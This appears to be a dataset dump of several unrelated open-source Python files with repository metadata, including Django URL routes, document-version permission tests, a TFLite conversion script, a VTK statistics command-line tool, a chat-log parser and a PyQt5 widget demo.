    print 'Computing mean RGB pixel ...'
    mean, std = np.zeros(3), np.zeros(3)
    for i, filename in enumerate(im_list):
        if verbose:# Write completion bar
            n = 1. * i / len(im_list)
            sys.stdout.write('\r')
            sys.stdout.write("[{:20}] {}%".format('='*int(n/0.05), int(100*n)))
            sys.stdout.flush()
        # Process image: flatten all pixels to an (npixels, 3) array.
        # NOTE(review): assumes every image is RGB (3 channels); a grayscale
        # or RGBA file would make the reshape fail — confirm inputs.
        im = np.array(Image.open(filename)).reshape(-1, 3)
        mean += np.mean(im, axis=0)
        std += np.std(im, axis=0)
    print ''
    mean, std = mean / len(im_list), std / len(im_list)
    return mean, std
| 38.751323 | 108 | 0.614145 |
5c71dd843ed45387db9266f95d3dd32129aea2ed | 1,260 | py | Python | djsani/dashboard/urls.py | carthagecollege/django-djsani | ad95158f443c9d4e0cd0cea2a99ebe7062d38ce5 | [
"BSD-3-Clause"
] | 1 | 2017-04-22T11:08:41.000Z | 2017-04-22T11:08:41.000Z | djsani/dashboard/urls.py | carthagecollege/django-djsani | ad95158f443c9d4e0cd0cea2a99ebe7062d38ce5 | [
"BSD-3-Clause"
] | 10 | 2020-06-11T14:22:47.000Z | 2021-07-08T14:05:27.000Z | djsani/dashboard/urls.py | carthagecollege/django-djsani | ad95158f443c9d4e0cd0cea2a99ebe7062d38ce5 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""URLs for all views."""
from django.urls import path
from django.views.generic import TemplateView
from djsani.dashboard import views
# URL routes for the dashboard application.
urlpatterns = [
    # static "operation succeeded" landing page
    path(
        'success/',
        TemplateView.as_view(template_name='dashboard/success.html'),
        name='admin_success',
    ),
    # generic send mail functions
    path('send-mail/', views.sendmail, name='sendmail'),
    # ajax communication to paint the panels
    path('panels/', views.panels, name='dashboard_panels'),
    # ajax endpoint returning students; kept separate from the home view
    # because combining it with security checks and the loading spinner
    # there proved unwieldy
    path('get-students/', views.get_students, name='get_students'),
    # simple ID search
    path('student/', views.student_detail, name='search_students'),
    # name search
    path('student/search/', views.advanced_search, name='search_advanced'),
    # student detail
    path('student/<int:cid>/', views.student_detail, name='student_detail'),
    # student detail scoped to a medium and content type
    path(
        'student/<int:cid>/<str:medium>/<str:content_type>/',
        views.student_detail,
        name='student_detail_medium',
    ),
    # home
    path('', views.home, name='dashboard_home'),
]
| 33.157895 | 77 | 0.649206 |
30eda8de5b211d49b8c4f3fb728c81ac58984920 | 2,528 | py | Python | mayan/apps/documents/tests/test_document_version_views.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 4 | 2019-02-17T08:35:42.000Z | 2019-03-28T06:02:11.000Z | mayan/apps/documents/tests/test_document_version_views.py | zhoubear/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 1 | 2018-10-11T13:01:34.000Z | 2018-10-11T13:01:34.000Z | mayan/apps/documents/tests/test_document_version_views.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 3 | 2019-01-29T13:21:57.000Z | 2019-10-27T03:20:15.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ..permissions import (
permission_document_version_revert, permission_document_version_view,
)
from .base import GenericDocumentViewTestCase
from .literals import (
TEST_SMALL_DOCUMENT_PATH, TEST_VERSION_COMMENT
)
class DocumentVersionTestCase(GenericDocumentViewTestCase):
    """View-level tests for listing and reverting document versions,
    with and without the corresponding access grants."""
    def setUp(self):
        super(DocumentVersionTestCase, self).setUp()
        # Every test here exercises authenticated views.
        self.login_user()
    def test_document_version_list_no_permission(self):
        # Without version-view access the list view must return 403.
        with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
            self.document.new_version(
                comment=TEST_VERSION_COMMENT, file_object=file_object
            )
        response = self.get(
            'documents:document_version_list', args=(self.document.pk,)
        )
        self.assertEqual(response.status_code, 403)
    def test_document_version_list_with_access(self):
        # With version-view access the list renders and shows the comment.
        self.grant_access(
            obj=self.document, permission=permission_document_version_view
        )
        with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
            self.document.new_version(
                comment=TEST_VERSION_COMMENT, file_object=file_object
            )
        response = self.get(
            'documents:document_version_list', args=(self.document.pk,)
        )
        self.assertContains(response, TEST_VERSION_COMMENT, status_code=200)
    def test_document_version_revert_no_permission(self):
        # Without revert access the POST is rejected and both versions remain.
        first_version = self.document.latest_version
        with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
            self.document.new_version(
                file_object=file_object
            )
        response = self.post(
            'documents:document_version_revert', args=(first_version.pk,)
        )
        self.assertEqual(response.status_code, 403)
        self.assertEqual(self.document.versions.count(), 2)
    def test_document_version_revert_with_access(self):
        # With revert access the POST redirects and only one version is left.
        first_version = self.document.latest_version
        with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
            self.document.new_version(
                file_object=file_object
            )
        self.grant_access(
            obj=self.document, permission=permission_document_version_revert
        )
        response = self.post(
            'documents:document_version_revert', args=(first_version.pk,),
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(self.document.versions.count(), 1)
| 31.209877 | 76 | 0.673655 |
00e8b0a28942bdc952adb5621866db271145ed70 | 326 | py | Python | project files/model_conv.py | onkark98/Parkinsons_Predictor_Project | e34cfa01715a3ef9428a8d2751881581c3d4911d | [
"MIT"
] | null | null | null | project files/model_conv.py | onkark98/Parkinsons_Predictor_Project | e34cfa01715a3ef9428a8d2751881581c3d4911d | [
"MIT"
] | null | null | null | project files/model_conv.py | onkark98/Parkinsons_Predictor_Project | e34cfa01715a3ef9428a8d2751881581c3d4911d | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
from tensorflow import keras
from tensorflow import lite
keras_file = "/home/subhranil/Train_Models/weights-improvement-992-0.1720.hdf5"
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
open("demo.tflite","wb").write(tflite_model)
| 32.6 | 79 | 0.819018 |
2dd5c70e231448e686f07c88fd8d40992a65e4e9 | 23,482 | py | Python | Examples/Infovis/Python/haruspex.py | b3c/VTK-5.8 | 9ad0280c669d2ad87a4ed521994f561cfa824337 | [
"BSD-3-Clause"
] | 2 | 2020-01-07T20:50:53.000Z | 2020-01-29T18:22:02.000Z | Examples/Infovis/Python/haruspex.py | carthurs/VTK-5.8.0 | fcaa03b2107687b72fa208b380a0134b10a0cedc | [
"BSD-3-Clause"
] | null | null | null | Examples/Infovis/Python/haruspex.py | carthurs/VTK-5.8.0 | fcaa03b2107687b72fa208b380a0134b10a0cedc | [
"BSD-3-Clause"
] | 2 | 2019-03-11T07:22:19.000Z | 2019-12-12T11:25:04.000Z | ############################################################
# Copyright 2010 Sandia Corporation.
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
############################################################
# Contact: Philippe Pebay, Sandia National Laboratories, pppebay@sandia.gov
############################################################
############################################################
from vtk import *
import sys
import getopt
############################################################
############################################################
# Global variable for convenience
verbosity = 0
############################################################
############################################################
# Usage function
def Usage( outModelPrefix, outDataName ):
    """Print the command-line usage message and exit with status 1.

    NB: the two parameters are accepted at every call site but are not
    used in the message body.
    """
    print "Usage:"
    print "\t [-h] Help: print this message and exit"
    print "\t -d <filename> name of CSV input data file"
    print "\t [-c <filename>] name of CSV file specifying columns of interest. Default: all columns are of interest"
    print "\t -e <engine> Type of statistics engine. Available engines are:"
    print "\t descriptive"
    print "\t order"
    print "\t contingency"
    print "\t correlative"
    print "\t multicorrelative"
    print "\t pca"
    print "\t kmeans"
    print "\t [-o <bitcode>] Engine options bitcode. Default is 0. Available bits are:"
    print "\t 1st bit: assess"
    print "\t 2nd bit: test"
    print "\t [-m <prefix>] prefix of CSV input model file(s). Default: calculate model from scratch"
    print "\t [-u] update input model (if data are provided as well). NB: update happens before assessment"
    print "\t [-s <prefix>] prefix of CSV output model (statistics) file(s)"
    print "\t [-a <filename>] name of CSV output data (annotated) file"
    print "\t [-t <filename>] name of CSV statistical test results file"
    print "\t [-v] Increase verbosity (from no flag = silent to -vvv = print all tables)"
    sys.exit( 1 )
############################################################
############################################################
# Parse command line
def ParseCommandLine():
    """Parse sys.argv with getopt and return the run configuration.

    Returns a 9-element list:
    [inDataName, inModelPrefix, updateModel, columnsListName, haruspexName,
     options, outDataName, outTestName, outModelPrefix].
    Exits (via Usage or sys.exit) on -h, on parse errors, or when the
    mandatory -d / -e arguments are missing. Increments the module-level
    `verbosity` once per -v flag.
    """
    # Declare use of global variable
    global verbosity
    # Default values
    options = 0
    inDataName = ""
    inModelPrefix = ""
    updateModel = False
    haruspexName = ""
    outModelPrefix = ""
    outDataName = ""
    outTestName = ""
    columnsListName =""
    # Try to hash command line with respect to allowable flags
    try:
        opts,args = getopt.getopt(sys.argv[1:], 'hd:e:o:m:us:a:t:c:v')
    except getopt.GetoptError:
        Usage( outModelPrefix, outDataName )
        sys.exit( 1 )
    # First verify that the helper has not been requested (supersedes everything else)
    # NB: handled first and separately so default values cannot be altered in helper message
    for o,a in opts:
        if o == "-h":
            Usage( outModelPrefix, outDataName )
    # Parse arguments and assign corresponding variables
    for o,a in opts:
        if o == "-d":
            inDataName = a
        elif o == "-e":
            haruspexName = a
        elif o == "-o":
            options = a
        elif o == "-m":
            inModelPrefix = a
        elif o == "-u":
            updateModel = True
        elif o == "-s":
            outModelPrefix = a
        elif o == "-a":
            outDataName = a
        elif o == "-t":
            outTestName = a
        elif o == "-c":
            columnsListName = a
        elif o == "-v":
            verbosity += 1
    # -d and -e are mandatory
    if not inDataName:
        print "ERROR: a data file name required!"
        sys.exit( 1 )
    if not haruspexName:
        print "ERROR: a statistics engine name is required!"
        sys.exit( 1 )
    if verbosity > 0:
        print "# Parsed command line:"
        print " Input data file:", inDataName
        if inModelPrefix != "":
            print " Input model file prefix:", inModelPrefix
        else:
            print " No input model"
        print " Statistics:", haruspexName
        if columnsListName != "":
            print " Columns of interest in file:", columnsListName
        else:
            print " Columns of interest: all"
        print " Output data file:", outDataName
        print " Output model file prefix:", outModelPrefix
        print
    return [ inDataName, \
             inModelPrefix, \
             updateModel, \
             columnsListName, \
             haruspexName, \
             options, \
             outDataName, \
             outTestName, \
             outModelPrefix ]
############################################################
############################################################
# Turn haruspex name into vtkStatistics object and ancillary parameters
def InstantiateStatistics( haruspexName ):
    """Map an engine name to a freshly constructed vtk*Statistics object.

    Exits the program (status 1) on an unknown engine name.
    """
    # Declare use of global variable
    global verbosity
    if haruspexName == "descriptive":
        haruspex = vtkDescriptiveStatistics()
    elif haruspexName == "order":
        haruspex = vtkOrderStatistics()
    elif haruspexName == "contingency":
        haruspex = vtkContingencyStatistics()
    elif haruspexName == "correlative":
        haruspex = vtkCorrelativeStatistics()
    elif haruspexName == "multicorrelative":
        haruspex = vtkMultiCorrelativeStatistics()
    elif haruspexName == "pca":
        haruspex = vtkPCAStatistics()
    elif haruspexName == "kmeans":
        haruspex = vtkKMeansStatistics()
    else:
        print "ERROR: Invalid statistics engine:", haruspexName
        sys.exit( 1 )
    if verbosity > 0:
        print "# Instantiated a", haruspex.GetClassName(), "object"
        print
    return haruspex
############################################################
############################################################
# Read input CSV model table as input port
def ReadInModelTable( inModelPrefix, tabIndex ):
    """Read one input model table from '<inModelPrefix>-<tabIndex>.csv'.

    Returns the configured vtkDelimitedTextReader (already Update()d) so
    its output port can be wired into a statistics pipeline.
    """
    # Declare use of global variable
    global verbosity
    if verbosity > 0:
        print "# Reading input model table", tabIndex
    # Set CSV reader parameters
    inTableReader = vtkDelimitedTextReader()
    inTableReader.SetFieldDelimiterCharacters(",")
    inTableReader.SetHaveHeaders( True )
    inTableReader.SetDetectNumericColumns( True )
    inTableReader.SetFileName( inModelPrefix + "-" + str( tabIndex ) + ".csv" )
    inTableReader.Update()
    if verbosity > 0:
        table = inTableReader.GetOutput()
        print " Number of columns:", table.GetNumberOfColumns()
        print " Number of rows:", table.GetNumberOfRows()
        if verbosity > 1:
            inTableReader.GetOutput().Dump( 16 )
        print
    return inTableReader
############################################################
############################################################
# Read input CSV data as input port
def ReadInData( inDataName ):
    """Read the input CSV data file into a vtkDelimitedTextReader.

    Returns the reader (already Update()d); callers use its output port
    as the statistics engine's input connection.
    """
    # Declare use of global variable
    global verbosity
    if verbosity > 0:
        print "# Reading input data"
    # Set CSV reader parameters
    inDataReader = vtkDelimitedTextReader()
    inDataReader.SetFieldDelimiterCharacters(",")
    inDataReader.SetHaveHeaders( True )
    inDataReader.SetDetectNumericColumns( True )
    inDataReader.SetFileName( inDataName )
    inDataReader.Update()
    if verbosity > 0:
        table = inDataReader.GetOutput()
        print " Number of columns:", table.GetNumberOfColumns()
        print " Number of rows:", table.GetNumberOfRows()
        print
    if verbosity > 2:
        print "# Input data:"
        inDataReader.GetOutput().Dump( 16 )
        print
    return inDataReader
############################################################
############################################################
# Read list of columns of interest
def ReadColumnsList( columnsListName ):
    """Read the single-row CSV naming the columns of interest.

    Returns a plain Python list with the first-row value of each column
    in the file (i.e. one entry per column of interest).
    """
    # Declare use of global variable
    global verbosity
    if verbosity > 0:
        print "# Reading list of columns of interest:"
    # Set CSV reader parameters (headerless: row 0 holds the names)
    columnsListReader = vtkDelimitedTextReader()
    columnsListReader.SetFieldDelimiterCharacters(",")
    columnsListReader.SetHaveHeaders( False )
    columnsListReader.SetDetectNumericColumns( True )
    columnsListReader.SetFileName( columnsListName )
    columnsListReader.Update()
    # Figure number of columns of interest
    table = columnsListReader.GetOutput()
    n = table.GetNumberOfColumns()
    if verbosity > 0:
        print " Number of columns of interest:", n
    # Now construct list of columns of interest
    columnsList = []
    for i in range( 0, n ):
        columnsList.append( table.GetColumn( i ).GetValue( 0 ) )
    if verbosity > 1:
        print " Columns of interest are:", columnsList
    if verbosity > 0:
        print
    return columnsList
############################################################
############################################################
# Write table from haruspex output port (i.e., for data or tests)
def WriteOutTable( haruspex, outPort, outFileName, outPortName, threshold ):
    """Dump one of the engine's output ports (data or tests) to a CSV file.

    No-op when outFileName is empty. `threshold` is the verbosity level
    above which the table is also dumped to stdout.
    """
    # Declare use of global variable
    global verbosity
    if outFileName == "":
        if verbosity > 0:
            print "# No output table of", outPortName, "required"
            print
        return
    if verbosity > 0:
        print "# Saving output table of", outPortName
    # Set CSV writer parameters
    outTableWriter = vtkDelimitedTextWriter()
    outTableWriter.SetFieldDelimiter(",")
    outTableWriter.SetFileName( outFileName )
    outTableWriter.SetInputConnection( haruspex.GetOutputPort( outPort ) )
    outTableWriter.Update()
    if verbosity > 0:
        print " Wrote", outPortName
        if verbosity > threshold:
            haruspex.GetOutput( outPort ).Dump( 16 )
        print
############################################################
############################################################
# Write haruspex output model
def WriteOutModel( haruspex, outModelPrefix ):
# Declare use of global variable
global verbosity
if outModelPrefix == "":
if verbosity > 0:
print "# No output model (statistics) required"
print
return
if verbosity > 0:
print "# Saving output model (statistics):"
# Set CSV writer parameters
outModelWriter = vtkDelimitedTextWriter()
outModelWriter.SetFieldDelimiter(",")
# Verify that model is a vtkMultiBlockDataSet, error out otherwise
outModelType = haruspex.GetOutputDataObject( 1 ).GetClassName()
if outModelType != "vtkMultiBlockDataSet":
print "ERROR: unsupported type of output model!"
sys.exit( 1 )
# Must iterate over all blocks of the vtkMultiBlockDataSet
outModel = haruspex.GetOutputDataObject( 1 )
n = outModel.GetNumberOfBlocks()
for i in range( 0, n ):
# Straightforward CSV file dump of a vtkTable
outModelName = outModelPrefix + "-" + str( i )+ ".csv"
outModelWriter.SetFileName( outModelName )
table = outModel.GetBlock( i )
outModelWriter.SetInput( table )
outModelWriter.Update()
if verbosity > 0:
print " Wrote", outModelName
if verbosity > 1:
table.Dump( 16 )
print
############################################################
############################################################
# Calculate statistics
def CalculateStatistics( inDataReader, inModelReader, updateModel, columnsList, haruspex, options ):
    """Configure and run the given VTK statistics engine ("haruspex").

    Parameters:
      inDataReader  -- reader whose output table is the input data.
      inModelReader -- list of per-table readers for a pre-existing model,
                       or None when no input model was provided.
      updateModel   -- when True, learn a new model from the data and
                       aggregate it with the input model before deriving;
                       otherwise derive/assess from the input model as-is.
      columnsList   -- indices of the columns of interest; [] selects all.
      haruspex      -- a vtk*Statistics algorithm instance (uni-, bi- or
                       multivariate).
      options       -- integer bit field: bit 0 enables Assess,
                       bit 1 enables Test.
    """
    # Declare use of global variable
    global verbosity
    if verbosity > 0:
        print "# Calculating statistics:"
    # Output port of data reader becomes input connection of haruspex
    haruspex.AddInputConnection( inDataReader.GetOutputPort() )
    # Get the output table of the data reader, which becomes the input data
    inData = inDataReader.GetOutput()
    # Figure number of columns of interest. If no list was provided, use them all
    if columnsList == []:
        columnsList = range( 0, inData.GetNumberOfColumns() )
    n = len( columnsList )
    # Generate list of columns of interest, depending on number of variables
    if haruspex.IsA( "vtkUnivariateStatisticsAlgorithm" ):
        # Univariate case: one request for each columns
        for i in range( 0, n ):
            colName = inData.GetColumnName( columnsList[i] )
            if verbosity > 0:
                print " Requesting column", colName
            haruspex.AddColumn( colName )
    elif haruspex.IsA( "vtkBivariateStatisticsAlgorithm" ):
        # Bivariate case: generate all possible pairs
        for i in range( 0, n ):
            colNameX = inData.GetColumnName( columnsList[i] )
            for j in range( i+1, n ):
                colNameY = inData.GetColumnName( columnsList[j] )
                if verbosity > 0:
                    print " Requesting column pair (", colNameX, ",", colNameY, ")"
                haruspex.AddColumnPair( colNameX, colNameY )
    else:
        # Multivariate case: generate single request containing all columns
        for i in range( 0, n ):
            colName = inData.GetColumnName( columnsList[i] )
            haruspex.SetColumnStatus( colName, 1 )
            if verbosity > 0:
                print " Adding column", colName, "to the request"
        # Complete column selection request
        haruspex.RequestSelectedColumns()
    # Figure which options were requested
    # Bit 0 of `options` controls the Assess phase (applied later, since it
    # depends on whether an input model is present).
    if int( options ) % 2:
        assessOption = True
        if verbosity > 0:
            print " Assess option is on"
    else:
        assessOption = False
        if verbosity > 0:
            print " Assess option is off"
    # Bit 1 of `options` controls the statistical Test phase.
    options = int( options ) >> 1
    if int( options ) % 2:
        haruspex.SetTestOption( True )
        if verbosity > 0:
            print " Test option is on"
    else:
        haruspex.SetTestOption( False )
        if verbosity > 0:
            print " Test option is off"
    if verbosity > 0:
        print
    # If an input model was provided, then update it first, otherwise run in a single pass
    if inModelReader == None:
        # No model reader: then Learn, Derive, and possibly Assess in a single pass
        haruspex.SetLearnOption( True )
        haruspex.SetDeriveOption( True )
        haruspex.SetAssessOption( assessOption )
        haruspex.Update()
    else:
        # Model readers are available: decide how many tables will be fetched
        nPrimaryTables = haruspex.GetNumberOfPrimaryTables()
        # Then create vtkMultiBlockDataSet with correspondingly many blocks
        inModel = vtkMultiBlockDataSet()
        inModel.SetNumberOfBlocks( nPrimaryTables )
        # Now iterate over all readers to obtain tables
        for t in range( 0, nPrimaryTables ):
            inTableReader = inModelReader[t]
            inTable = inTableReader.GetOutput()
            # Handle special case of second table of order statistics
            # (the CSV reader yields generic column types; the statistics
            # engine needs typed Key/Value/Cardinality columns).
            if ( t > 0 and haruspex.GetClassName() == "vtkOrderStatistics" ):
                if verbosity > 0:
                    print "# Converting input order table to appropriate column types"
                # Create a programmable filter whose input is the order table
                convertOrderTab = vtkProgrammableFilter()
                convertOrderTab.SetInput( inTable )
                # Define table converter callback for programmable filter.
                # NOTE: the callback closes over convertOrderTab and is
                # invoked synchronously by the Update() call below.
                def ConvertOrderTableCallback():
                    readTable = convertOrderTab.GetInput()
                    convTable = convertOrderTab.GetOutput()
                    # Create columns with appropriate names and formats
                    kCol = vtkIdTypeArray()
                    kCol.SetName( "Key" )
                    convTable.AddColumn( kCol )
                    xCol = vtkStringArray()
                    xCol.SetName( "Value" )
                    convTable.AddColumn( xCol )
                    cCol = vtkIdTypeArray()
                    cCol.SetName( "Cardinality" )
                    convTable.AddColumn( cCol )
                    # Loop over all input rows and create output rows
                    nRow = readTable.GetNumberOfRows()
                    row = vtkVariantArray()
                    row.SetNumberOfValues( 3 )
                    for r in range( 0, nRow ):
                        # Retrieve primary statistics and convert to correct type
                        k = readTable.GetValueByName( r, "Key" ).ToInt()
                        row.SetValue( 0, k )
                        x = readTable.GetValueByName( r, "Value" ).ToString()
                        row.SetValue( 1, x )
                        c = readTable.GetValueByName( r, "Cardinality" ).ToInt()
                        row.SetValue( 2, c )
                        convTable.InsertNextRow( row )
                # Set callback and run programmable filer
                convertOrderTab.SetExecuteMethod( ConvertOrderTableCallback )
                convertOrderTab.Update()
                # Retrieve converted table from filter output
                inTable = convertOrderTab.GetOutput()
                if verbosity > 1:
                    inTable.Dump( 16 )
            # Handle special case of second table of contingency statistics
            # (same typed-column conversion, but with x/y value columns).
            if ( t > 0 and haruspex.GetClassName() == "vtkContingencyStatistics" ):
                if verbosity > 0:
                    print "# Converting input contingency table to appropriate column types"
                # Create a programmable filter whose input is the contingency table
                convertContingencyTab = vtkProgrammableFilter()
                convertContingencyTab.SetInput( inTable )
                # Define table converter callback for programmable filter
                def ConvertContingencyTableCallback():
                    readTable = convertContingencyTab.GetInput()
                    convTable = convertContingencyTab.GetOutput()
                    # Create columns with appropriate names and formats
                    kCol = vtkIdTypeArray()
                    kCol.SetName( "Key" )
                    convTable.AddColumn( kCol )
                    xCol = vtkStringArray()
                    xCol.SetName( "x" )
                    convTable.AddColumn( xCol )
                    yCol = vtkStringArray()
                    yCol.SetName( "y" )
                    convTable.AddColumn( yCol )
                    cCol = vtkIdTypeArray()
                    cCol.SetName( "Cardinality" )
                    convTable.AddColumn( cCol )
                    # Loop over all input rows and create output rows
                    nRow = readTable.GetNumberOfRows()
                    row = vtkVariantArray()
                    row.SetNumberOfValues( 4 )
                    for r in range( 0, nRow ):
                        # Retrieve primary statistics and convert to correct type
                        k = readTable.GetValueByName( r, "Key" ).ToInt()
                        row.SetValue( 0, k )
                        x = readTable.GetValueByName( r, "x" ).ToString()
                        row.SetValue( 1, x )
                        y = readTable.GetValueByName( r, "y" ).ToString()
                        row.SetValue( 2, y )
                        c = readTable.GetValueByName( r, "Cardinality" ).ToInt()
                        row.SetValue( 3, c )
                        convTable.InsertNextRow( row )
                # Set callback and run programmable filer
                convertContingencyTab.SetExecuteMethod( ConvertContingencyTableCallback )
                convertContingencyTab.Update()
                # Retrieve converted table from filter output
                inTable = convertContingencyTab.GetOutput()
                if verbosity > 1:
                    inTable.Dump( 16 )
            # Set retrieved table to corresponding model block
            inModel.SetBlock( t, inTable )
        # If model update is required, then learn new model and aggregate, otherwise assess directly
        if updateModel == True:
            # Store model it for subsequent aggregation
            collection = vtkDataObjectCollection()
            collection.AddItem( inModel )
            # Then learn a new primary model (do not derive nor assess)
            haruspex.SetLearnOption( True )
            haruspex.SetDeriveOption( False )
            haruspex.SetAssessOption( False )
            haruspex.Update()
            # Aggregate old and new models
            collection.AddItem( haruspex.GetOutputDataObject( 1 ) )
            aggregated = vtkMultiBlockDataSet()
            haruspex.Aggregate( collection, aggregated )
            # Finally, derive and possibly assess using the aggregated model (do not learn)
            haruspex.SetInput( 2, aggregated )
            haruspex.SetLearnOption( False )
            haruspex.SetDeriveOption( True )
            haruspex.SetAssessOption( assessOption )
            haruspex.Update()
        else:
            # Only derive and possibly assess using the input model (do not aggregate)
            haruspex.SetInput( 2, inModel )
            haruspex.SetLearnOption( False )
            haruspex.SetDeriveOption( True )
            haruspex.SetAssessOption( assessOption )
            haruspex.Update()
    print
############################################################
############################################################
# Main function
def main():
    """Drive the full statistics pipeline: parse the command line, read
    the input data (and model, if any), compute, and save all outputs."""
    # Parse command line
    ( inDataName,
      inModelPrefix,
      updateModel,
      columnsListName,
      haruspexName,
      options,
      outDataName,
      outTestName,
      outModelPrefix ) = ParseCommandLine()
    # Verify that haruspex name makes sense and if so instantiate accordingly
    haruspex = InstantiateStatistics( haruspexName )
    # Set input data reader
    inDataReader = ReadInData( inDataName )
    # Set input model readers only if a prefix was provided
    inModelReader = None
    if inModelPrefix != "":
        inModelReader = [ ReadInModelTable( inModelPrefix, t )
                          for t in range( haruspex.GetNumberOfPrimaryTables() ) ]
    # Read list of columns of interest ([] means all columns)
    columnsList = ReadColumnsList( columnsListName ) if columnsListName else []
    # Calculate statistics
    CalculateStatistics( inDataReader, inModelReader, updateModel, columnsList, haruspex, options )
    # Save output (annotated) data
    WriteOutTable( haruspex, 0, outDataName, "annotated data", 2 )
    # Save output of statistical tests
    WriteOutTable( haruspex, 2, outTestName, "statistical test results", 1 )
    # Save output model (statistics)
    WriteOutModel( haruspex, outModelPrefix )
############################################################
############################################################
if __name__ == "__main__":
    main()
############################################################
| 37.332273 | 119 | 0.551657 |
f35cef6e907251065f70168d1c83142b17183731 | 546 | py | Python | parsechat.py | steamroller-airmash/statsbot-log-tools | ae062b195d3ef587ad6e61ba3e7b89890805903a | [
"MIT"
] | null | null | null | parsechat.py | steamroller-airmash/statsbot-log-tools | ae062b195d3ef587ad6e61ba3e7b89890805903a | [
"MIT"
] | null | null | null | parsechat.py | steamroller-airmash/statsbot-log-tools | ae062b195d3ef587ad6e61ba3e7b89890805903a | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import logparser
import sys

# Exit with a usage message when no log file was given on the command line.
if len(sys.argv) < 2:
    print("usage parsechat <logfile>")
    sys.exit(-1)

# Map of currently-connected player ids to their display names.
names = {}

with open(sys.argv[1], 'r', errors='ignore') as logfile:
    for entry in logparser.parse_log(logfile):
        if entry['record_type'] == "PLAYER_NEW":
            names[entry['id']] = entry['name']
        elif entry['record_type'] == "PLAYER_LEAVE":
            names.pop(entry['id'], None)
        elif entry['record_type'] == "CHAT_PUBLIC":
            # The sender may have connected before logging started, so its
            # id can be missing from `names`; fall back to a placeholder
            # instead of crashing with a KeyError.
            print(names.get(entry['id'], "<unknown>") + ": " + entry['text'])
44b21ac1a9f9bd2dd64c0cf355c229a42813cef8 | 4,281 | py | Python | docs/pyqt/widzety/gui_z5.py | damiankarol7/python101 | 1978a9402a8fb0f20c4ca7bd542cb8d7d4501b9b | [
"MIT"
] | 44 | 2015-02-11T19:10:37.000Z | 2021-11-11T09:45:43.000Z | docs/pyqt/widzety/gui_z5.py | damiankarol7/python101 | 1978a9402a8fb0f20c4ca7bd542cb8d7d4501b9b | [
"MIT"
] | 9 | 2015-02-06T21:26:25.000Z | 2022-03-31T10:44:22.000Z | docs/pyqt/widzety/gui_z5.py | damiankarol7/python101 | 1978a9402a8fb0f20c4ca7bd542cb8d7d4501b9b | [
"MIT"
] | 172 | 2015-06-13T07:16:24.000Z | 2022-03-30T20:41:11.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ksztalty import Ksztalty, Ksztalt
from PyQt5.QtWidgets import QHBoxLayout
from PyQt5.QtWidgets import QCheckBox, QButtonGroup, QVBoxLayout
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QSlider, QLCDNumber, QSplitter
from PyQt5.QtWidgets import QRadioButton, QGroupBox
from PyQt5.QtWidgets import QComboBox, QSpinBox
from PyQt5.QtWidgets import QPushButton
class Ui_Widget(object):
    """ Class defining the GUI """

    def setupUi(self, Widget):
        """Build all widgets and layouts of the demo window.

        Note: `Widget` is accepted for Qt Designer-style compatibility but
        is not used; the widgets are parented to `self` instead.
        """
        # shape-drawing widgets, instances of the Ksztalt class
        self.ksztalt1 = Ksztalt(self, Ksztalty.Polygon)
        self.ksztalt2 = Ksztalt(self, Ksztalty.Ellipse)
        # the shape currently targeted by the colour controls
        self.ksztaltAktywny = self.ksztalt1
        # CheckBox buttons ###
        uklad = QVBoxLayout()  # vertical layout
        self.grupaChk = QButtonGroup()
        # one checkbox per shape name (square, circle, triangle, line)
        for i, v in enumerate(('Kwadrat', 'Koło', 'Trójkąt', 'Linia')):
            self.chk = QCheckBox(v)
            self.grupaChk.addButton(self.chk, i)
            uklad.addWidget(self.chk)
        # pre-check the box matching the active shape's current kind
        self.grupaChk.buttons()[self.ksztaltAktywny.ksztalt].setChecked(True)
        # CheckBox for choosing the active shape widget
        self.ksztaltChk = QCheckBox('<=')
        self.ksztaltChk.setChecked(True)
        uklad.addWidget(self.ksztaltChk)
        # horizontal layout for the shapes and the CheckBox buttons
        ukladH1 = QHBoxLayout()
        ukladH1.addWidget(self.ksztalt1)
        ukladH1.addLayout(uklad)
        ukladH1.addWidget(self.ksztalt2)
        # end CheckBox ###
        # Slider and LCDNumber ###
        self.suwak = QSlider(Qt.Horizontal)
        self.suwak.setMinimum(0)
        self.suwak.setMaximum(255)  # full range of one RGB channel
        self.lcd = QLCDNumber()
        self.lcd.setSegmentStyle(QLCDNumber.Flat)
        # horizontal layout (splitter) for the slider and lcd
        ukladH2 = QSplitter(Qt.Horizontal, self)
        ukladH2.addWidget(self.suwak)
        ukladH2.addWidget(self.lcd)
        ukladH2.setSizes((125, 75))
        # RadioButton buttons ###
        self.ukladR = QHBoxLayout()
        for v in ('R', 'G', 'B'):
            self.radio = QRadioButton(v)
            self.ukladR.addWidget(self.radio)
        # default to the first channel (R)
        self.ukladR.itemAt(0).widget().setChecked(True)
        # group the buttons
        self.grupaRBtn = QGroupBox('Opcje RGB')
        self.grupaRBtn.setLayout(self.ukladR)
        self.grupaRBtn.setObjectName('Radio')
        self.grupaRBtn.setCheckable(True)
        # horizontal layout for the Radio group
        ukladH3 = QHBoxLayout()
        ukladH3.addWidget(self.grupaRBtn)
        # end RadioButton ###
        # ComboBox list and SpinBox ###
        self.listaRGB = QComboBox(self)
        for v in ('R', 'G', 'B'):
            self.listaRGB.addItem(v)
        self.listaRGB.setEnabled(False)
        # SpinBox
        self.spinRGB = QSpinBox()
        self.spinRGB.setMinimum(0)
        self.spinRGB.setMaximum(255)
        self.spinRGB.setEnabled(False)
